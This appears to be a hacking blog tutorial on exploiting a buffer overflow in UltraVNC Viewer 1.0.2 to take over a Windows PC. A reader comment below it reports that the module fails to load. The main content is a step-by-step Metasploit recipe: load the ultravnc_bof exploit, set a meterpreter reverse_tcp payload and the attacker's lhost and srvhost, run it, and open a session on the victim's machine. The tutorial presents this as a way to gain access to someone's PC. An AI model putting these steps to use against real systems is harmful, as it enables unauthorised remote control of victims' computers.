Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack

This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack

Exploit Targets

0 – Windows XP SP3 (default)

1-Windows XP SP2

2-Windows 7

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/vnc/ultravnc_bof

Msf exploit (ultravnc_bof)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ultravnc_bof)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ultravnc_bof)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ultravnc_bof)>exploit 

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

3 Comments Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack

  1. Anonym

    When i type use exploit/windows/vnc/ultravnc_bof it say : Failed to load module…. What could be the problem?im new in this

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *